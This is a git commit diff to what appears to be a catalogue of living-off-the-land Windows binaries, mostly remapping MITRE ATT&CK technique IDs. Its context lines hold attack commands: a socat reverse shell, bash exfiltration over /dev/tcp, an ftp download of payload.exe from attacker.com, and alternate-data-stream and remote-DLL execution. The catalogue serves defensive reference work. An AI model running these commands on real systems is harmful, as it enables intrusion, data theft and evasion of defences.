More changes (mainly changing some T1218 instances to T1202)

2024-10-22 16:49:11 +02:00 · 2021-11-05 20:17:04 +00:00 · 2021-11-05 20:17:04 +00:00 · bc51cb4e03
commit bc51cb4e03
parent 2577066af9
10 changed files with 19 additions and 19 deletions
--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
@ -9,28 +9,28 @@ Commands:
    Usecase: Performs execution of specified file, can be used as a defensive evasion.
    Category: Execute
    Privileges: User
-    MitreID: T1218
+    MitreID: T1202
    OperatingSystem: Windows 10
  - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
    Description: Executes a reverseshell
    Usecase: Performs execution of specified file, can be used as a defensive evasion.
    Category: Execute
    Privileges: User
-    MitreID: T1218
+    MitreID: T1202
    OperatingSystem: Windows 10
  - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
    Description: Exfiltrate data
    Usecase: Performs execution of specified file, can be used as a defensive evasion.
    Category: Execute
    Privileges: User
-    MitreID: T1218
+    MitreID: T1202
    OperatingSystem: Windows 10
  - Command: bash.exe -c calc.exe
    Description: Executes calc.exe from bash.exe
    Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
    Category: AWL Bypass
    Privileges: User
-    MitreID: T1218
+    MitreID: T1202
    OperatingSystem: Windows 10
 Full_Path:
  - Path: C:\Windows\System32\bash.exe
--- a/yml/OSBinaries/Diskshadow.yml
+++ b/yml/OSBinaries/Diskshadow.yml
@ -16,7 +16,7 @@ Commands:
    Usecase: Use diskshadow to bypass defensive counter measures
    Category: Execute
    Privileges: User
-    MitreID: T1003
+    MitreID: T1202
    OperatingSystem: Windows server
 Full_Path:
  - Path: C:\Windows\System32\diskshadow.exe
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@ -9,14 +9,14 @@ Commands:
    Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
    Category: Execute
    Privileges: User
-    MitreID: T1218
+    MitreID: T1202
    OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: explorer.exe C:\Windows\System32\notepad.exe
    Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
    Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
    Category: Execute
    Privileges: User
-    MitreID: T1218
+    MitreID: T1202
    OperatingSystem: Windows 10 (Tested)
 Full_Path:
  - Path: C:\Windows\explorer.exe
--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
@ -9,7 +9,7 @@ Commands:
    Usecase: Use forfiles to start a new process to evade defensive counter measures
    Category: Execute
    Privileges: User
-    MitreID: T1218
+    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
    Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@ -9,7 +9,7 @@ Commands:
    Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
    Category: Execute
    Privileges: User
-    MitreID: T1218
+    MitreID: T1202
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
    Description: Download
--- a/yml/OSBinaries/Gpscript.yml
+++ b/yml/OSBinaries/Gpscript.yml
@ -9,14 +9,14 @@ Commands:
    Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
    Category: Execute
    Privileges: Administrator
-    MitreID: T1216
+    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: Gpscript /startup
    Description: Executes startup scripts configured in Group Policy
    Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
    Category: Execute
    Privileges: Administrator
-    MitreID: T1216
+    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
  - Path: C:\Windows\System32\gpscript.exe
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@ -16,7 +16,7 @@ Commands:
    Usecase: Execute process with HH.exe
    Category: Execute
    Privileges: User
-    MitreID: T1216
+    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
  - Path: C:\Windows\System32\hh.exe
--- a/yml/OSBinaries/Pcalua.yml
+++ b/yml/OSBinaries/Pcalua.yml
@ -9,21 +9,21 @@ Commands:
    Usecase: Proxy execution of binary
    Category: Execute
    Privileges: User
-    MitreID: T1218
+    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: pcalua.exe -a \\server\payload.dll
    Description: Open the target .DLL file with the Program Compatibilty Assistant.
    Usecase: Proxy execution of remote dll file
    Category: Execute
    Privileges: User
-    MitreID: T1218
+    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
    Description: Open the target .CPL file with the Program Compatibility Assistant.
    Usecase: Execution of CPL files
    Category: Execute
    Privileges: User
-    MitreID: T1218
+    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
  - Path: C:\Windows\System32\pcalua.exe
--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@ -9,11 +9,11 @@ Commands:
    Usecase: Execute binary through proxy binary to evade defensive counter measurments
    Category: Execute
    Privileges: User
-    MitreID: T1218
+    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
-    Description: Executes calc.cmde from remote server
-    Usecase: Execute binary through proxy binary  from external server to evade defensive counter measurments
+    Description: Executes calc.cmd from remote server
+    Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
    Category: Execute
    Privileges: User
    MitreID: T1218
--- a/yml/OSScripts/Pubprn.yml
+++ b/yml/OSScripts/Pubprn.yml
@ -9,7 +9,7 @@ Commands:
    Usecase: Proxy execution
    Category: Execute
    Privileges: User
-    MitreID: T1216
+    MitreID: T1216.001
    OperatingSystem: Windows 10
 Full_Path:
  - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs